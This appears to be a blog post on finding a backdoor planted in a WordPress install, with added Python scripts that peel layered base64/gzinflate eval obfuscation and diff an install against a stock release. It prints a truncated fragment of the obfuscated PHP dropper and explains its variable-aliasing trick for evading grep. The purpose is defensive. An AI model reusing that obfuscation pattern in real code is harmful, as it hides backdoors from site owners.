wordpress hack found

after a month or two of living with a backdoor in the wordpress install on dailywireless.org, it has finally been found.

$ diff -r wordpress-2.8.4/ dailywireless.org/
...
Only in dailywireless.org/wp-admin: fonction.php
Only in dailywireless.org/wp-admin: wp-conf.php
Only in dailywireless.org/wp-admin: wp-links.php

a diff between dailywireless.org's wordpress code and stock 2.8.4 code showed no differences in any of the shared files, but it did show three files that exist only in the install: the ones listed above. they contain some highly obfuscated code which looks like

<?php $o="QAAAO29zams5Cg0nJztvgA6RyA68DoSdvYm5gb3M9JzWP8QSRJyU503Cb0AORBKYI2 Wrg0QAHBlRyZQDxvP4HASgNoQCQDnAQgC0oD8eb5TH2CjJS0AKAHTE46AADYGn0E hAoZ2I=";eval(base64_decode("JGxs...

which decodes into the first of numerous layers of base64-encoded php. note the aliasing trick: the first inner blob decodes to $lllllllllll='base64_decode'; and the second to $llllllllll='ord';, so the later eval() calls reach the decoder through a variable name instead of the function name, which is enough to dodge a naive grep for base64_decode.

"$lll=0;eval(base64_decode(\"JGxsbGxsbGxsbGxsPSdiYXNlNjRfZGVjb2RlJzs=\"));$ll=0;eval($lllllllllll(\"JGxsbGxsbGxsbGw9J29yZCc7\"));$llll=0;

once i had some of the decoded code, i could google for it and found other people who have dealt with this kind of intrusion before. the best resource i found is an automated web tool that decodes the obfuscation all the way down to the resulting php.
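the same peeling can be done offline. the script below is an added example, not the web tool mentioned above and not code from the original post: it inlines every eval(...) whose argument it can decode statically, tracks the $name='base64_decode'; aliasing trick, and repeats until no decodable eval is left. it goes a little beyond the base64-only layers shown here by also understanding gzinflate, gzuncompress, str_rot13 and strrev, which are the other functions these droppers commonly stack. the sample payload it builds for itself is constructed in the style of the snippets above; it is not the real dailywireless.org backdoor.

```python
import base64
import codecs
import re
import zlib

# PHP decoder name -> Python equivalent. Only these are undone statically;
# anything else (string concatenation, custom decoders) is left in place.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, like PHP gzinflate()
    "gzuncompress": zlib.decompress,                   # zlib-wrapped, like PHP gzuncompress()
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(['\"])(\w+)\2\s*;")   # $lllllllllll='base64_decode';
EVAL_RE = re.compile(r"\beval\s*\(")
CALL_RE = re.compile(r"\s*(\$?\w+)\s*\(")                     # f(  or  $alias(
STR_RE = re.compile(r"\s*(['\"])([^'\"]*)\1")                 # the quoted blob
CLOSE_RE = re.compile(r"\s*\)")
TAIL_RE = re.compile(r"\s*;?")


def _parse_eval(src, i):
    """Parse f1(f2(...("blob")...)) starting just after 'eval('.
    Returns (callees outermost-first, blob, index past the closing parens/';') or None."""
    chain = []
    while True:
        m = CALL_RE.match(src, i)
        if not m:
            break
        chain.append(m.group(1))
        i = m.end()
    m = STR_RE.match(src, i)
    if not chain or not m:
        return None
    blob, i = m.group(2), m.end()
    for _ in range(len(chain) + 1):          # one ')' per callee plus eval's own
        m = CLOSE_RE.match(src, i)
        if not m:
            return None
        i = m.end()
    return chain, blob, TAIL_RE.match(src, i).end()


def _decode(chain, blob, aliases):
    """Apply the call chain innermost-first; resolve $alias names through the assignments seen so far."""
    data = blob.encode("latin-1")
    for name in reversed(chain):
        fn = aliases.get(name[1:]) if name.startswith("$") else name
        if fn not in DECODERS:
            return None
        try:
            data = DECODERS[fn](data)
        except (ValueError, zlib.error):
            return None
    return data.decode("latin-1")


def peel(src, max_layers=100):
    """Replace each statically decodable eval(...) with the code it would run, until none remain.
    Returns (inlined source, number of eval layers removed)."""
    removed = 0
    while removed < max_layers:
        aliases = {name: value for name, _q, value in ASSIGN_RE.findall(src)}
        for m in EVAL_RE.finditer(src):
            parsed = _parse_eval(src, m.end())
            if parsed is None:
                continue
            chain, blob, end = parsed
            decoded = _decode(chain, blob, aliases)
            if decoded is None:
                continue
            decoded = re.sub(r"^\s*<\?php\s*|\s*\?>\s*$", "", decoded)   # drop tags from inlined code
            src = src[:m.start()] + decoded + src[end:]
            removed += 1
            break
        else:
            break          # no eval could be resolved: we are at the bottom
    return src, removed


def _b64(data):
    return base64.b64encode(data).decode("ascii")


def _deflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def build_sample():
    """Constructed four-layer dropper in the style of the post's snippets (not the real payload)."""
    inner = "echo 'innermost layer';"
    layer3 = 'eval(gzinflate(base64_decode("%s")));' % _b64(_deflate(inner.encode()))
    alias = "$lllllllllll='base64_decode';"
    layer2 = ('$lll=0;eval(base64_decode("%s"));$ll=0;eval($lllllllllll("%s"));'
              % (_b64(alias.encode()), _b64(layer3.encode())))
    return '<?php $o="junk";eval(base64_decode("%s"));' % _b64(layer2.encode())


if __name__ == "__main__":
    final, layers = peel(build_sample())
    print("layers removed:", layers)
    print(final)
```

run it against a suspect file with peel(open(path).read()); whatever is still wrapped in eval() afterwards is built at runtime (string concatenation, chr() tables, the 'ord' alias above) and needs a look by hand.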

fonction.php decodes to this, and wp-conf.php decodes to this. wp-links.php was identical to wp-conf.php.

the backdoor was probably placed before the 2.8.4 upgrade through some older security hole. it survived the upgrade because the wordpress upgrader only overwrites, and removes, files it knows about from the release package; a file that was never part of the stock codebase is left alone, so it will ride through every future upgrade too. a diff against a clean copy of the same version is the check that catches it.
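the diff -r above is the right idea, so here it is as a repeatable check. this is an added example, not code from the original post or from wordpress itself: it walks a stock release tree and the live install, and reports files that exist only in the install (the candidates for planted backdoors), files present in both whose contents differ, and stock files that are missing. it ignores paths that are legitimately absent from a stock tree (wp-config.php, .htaccess, wp-content/uploads/); the ignore list is an assumption to adjust per site, and plugins or themes you installed yourself will show up as extras and need to be compared against their own release files. the fixture it builds for itself is constructed and uses the three file names from the post with placeholder contents.

```python
import hashlib
import os
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _walk(root):
    """Map relative path -> sha256 for every regular file under root."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for n in names:
            full = os.path.join(dirpath, n)
            files[os.path.relpath(full, root).replace(os.sep, "/")] = _sha256(full)
    return files


# Assumed per-site ignore list: paths a stock tree never contains.
DEFAULT_IGNORE = ("wp-config.php", ".htaccess", "wp-content/uploads/")


def compare_trees(stock, install, ignore=DEFAULT_IGNORE):
    """Return (extra, modified, missing), all as sorted lists of relative paths.
    extra: in the install but not in the stock release (backdoor candidates)
    modified: in both, but contents differ
    missing: in the stock release but absent from the install"""
    s, i = _walk(stock), _walk(install)
    ignored = lambda p: any(p == x or p.startswith(x) for x in ignore)
    extra = sorted(p for p in i if p not in s and not ignored(p))
    modified = sorted(p for p in s if p in i and s[p] != i[p])
    missing = sorted(p for p in s if p not in i)
    return extra, modified, missing


def build_demo():
    """Constructed fixture: a tiny 'stock' tree, and an install that is the same tree
    plus the three files named in the post (placeholder contents) and a wp-config.php."""
    base = tempfile.mkdtemp()
    stock = os.path.join(base, "wordpress-2.8.4")
    install = os.path.join(base, "dailywireless.org")
    legit = {"wp-login.php": b"<?php // login\n", "wp-admin/admin.php": b"<?php // admin\n"}
    planted = {"wp-admin/fonction.php": b"<?php eval(base64_decode('...'));\n",
               "wp-admin/wp-conf.php": b"<?php eval(base64_decode('...'));\n",
               "wp-admin/wp-links.php": b"<?php eval(base64_decode('...'));\n",
               "wp-config.php": b"<?php // site config, legitimately not in stock\n"}
    for root, files in ((stock, legit), (install, {**legit, **planted})):
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(body)
    return stock, install


if __name__ == "__main__":
    stock, install = build_demo()
    extra, modified, missing = compare_trees(stock, install)
    for label, paths in (("only in install", extra), ("modified", modified), ("missing", missing)):
        for p in paths:
            print("%s: %s" % (label, p))
```

point compare_trees at a freshly unpacked release zip of the exact version you run and at the live document root; run it from cron after each upgrade, since the upgrader will not do this for you.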
